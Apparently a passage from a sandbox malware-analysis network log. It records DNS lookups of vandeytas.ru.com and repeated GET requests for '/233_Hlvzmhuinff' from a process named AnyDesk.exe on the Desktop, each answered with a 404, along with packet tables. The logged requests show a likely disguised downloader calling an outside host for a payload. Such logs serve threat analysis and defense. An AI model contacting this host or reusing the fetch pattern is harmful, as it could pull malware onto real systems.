Nov 26, 2024 08:12:56.699335098 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.177984953 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.178060055 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.178188086 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.178431034 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.178447962 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.178467989 CET	50033	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.178473949 CET	443	50033	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.349941969 CET	50039	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.349975109 CET	443	50039	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.350087881 CET	50039	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.350236893 CET	50039	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.350294113 CET	443	50039	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.350354910 CET	50039	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.359014988 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.359065056 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:57.359133005 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.359466076 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:57.359479904 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:58.769694090 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:58.769829988 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:58.771265030 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:58.771275997 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:58.771512985 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:58.772725105 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:58.819319963 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.288428068 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.288501024 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.288599014 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.311345100 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.311373949 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.311419964 CET	50040	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.311427116 CET	443	50040	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.481585979 CET	50046	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.481615067 CET	443	50046	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.481690884 CET	50046	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.481751919 CET	50046	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.481828928 CET	443	50046	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.481880903 CET	50046	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.490434885 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.490477085 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:12:59.490572929 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.490858078 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:12:59.490873098 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:00.903202057 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:00.903306007 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:00.904681921 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:00.904694080 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:00.904947042 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:00.906229019 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:00.947336912 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.421694994 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.421780109 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.421845913 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.702955008 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.702955008 CET	50047	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.702980995 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.702991009 CET	443	50047	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.877660990 CET	50053	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.877708912 CET	443	50053	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.877768040 CET	50053	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.877863884 CET	50053	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.877904892 CET	443	50053	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.877959013 CET	50053	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.887516975 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.887554884 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:01.887624979 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.887938976 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:01.887948990 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.301173925 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.301312923 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.302779913 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.302786112 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.303030014 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.304727077 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.351330996 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.823882103 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.823947906 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.824007034 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.824321985 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.824341059 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.824351072 CET	50054	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.824361086 CET	443	50054	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.997699976 CET	50059	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:03.997756958 CET	443	50059	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:03.997873068 CET	50059	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:04.001631021 CET	50059	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:04.001692057 CET	443	50059	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:04.001758099 CET	50059	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:04.011897087 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:04.011943102 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:04.012080908 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:04.012360096 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:04.012377024 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.421603918 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.421742916 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:05.423162937 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:05.423176050 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.423445940 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.424706936 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:05.471362114 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.940591097 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.940668106 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.940746069 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:05.941056967 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:05.941056967 CET	50061	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:05.941076994 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:05.941087961 CET	443	50061	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:06.111413002 CET	50064	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.111460924 CET	443	50064	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:06.111591101 CET	50064	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.111747026 CET	50064	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.111800909 CET	443	50064	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:06.111949921 CET	50064	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.121432066 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.121483088 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:06.121557951 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.121906996 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:06.121920109 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.488178968 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.488315105 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:07.489825010 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:07.489831924 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.490076065 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.491297007 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:07.535330057 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.998691082 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.998843908 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:07.998908997 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.009546995 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.009569883 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:08.009583950 CET	50065	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.009589911 CET	443	50065	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:08.187525034 CET	50071	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.187561989 CET	443	50071	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:08.187722921 CET	50071	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.193084955 CET	50071	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.193133116 CET	443	50071	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:08.193223000 CET	50071	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.203448057 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.203471899 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:08.203541040 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.204166889 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:08.204178095 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:09.615797997 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:09.615876913 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:09.617523909 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:09.617532015 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:09.617780924 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:09.619046926 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:09.659358025 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:10.185405970 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:10.185480118 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:10.185528040 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:10.185861111 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:10.185875893 CET	443	50072	50.7.187.218	192.168.2.6
Nov 26, 2024 08:13:10.185887098 CET	50072	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:13:10.185893059 CET	443	50072	50.7.187.218	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:11:06.508061886 CET	50051	53	192.168.2.6	1.1.1.1
Nov 26, 2024 08:11:07.517246962 CET	50051	53	192.168.2.6	1.1.1.1
Nov 26, 2024 08:11:07.852077007 CET	53	50051	1.1.1.1	192.168.2.6
Nov 26, 2024 08:11:07.852108002 CET	53	50051	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 08:11:06.508061886 CET	192.168.2.6	1.1.1.1	0x5fb8	Standard query (0)	vandeytas.ru.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:11:07.517246962 CET	192.168.2.6	1.1.1.1	0x5fb8	Standard query (0)	vandeytas.ru.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 08:11:07.852077007 CET	1.1.1.1	192.168.2.6	0x5fb8	No error (0)	vandeytas.ru.com		50.7.187.218	A (IP address)	IN (0x0001)	false
Nov 26, 2024 08:11:07.852108002 CET	1.1.1.1	192.168.2.6	0x5fb8	No error (0)	vandeytas.ru.com		50.7.187.218	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

vandeytas.ru.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:09 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:09 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:09 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:09 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:11 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:12 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:11 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:12 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49713	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:13 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:14 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:14 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:14 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49715	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:16 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:16 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:16 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:16 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49718	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:18 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:18 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:18 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:18 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49725	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:20 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:21 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:20 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:21 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49733	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:11:22 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:11:23 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:11:23 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:11:23 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 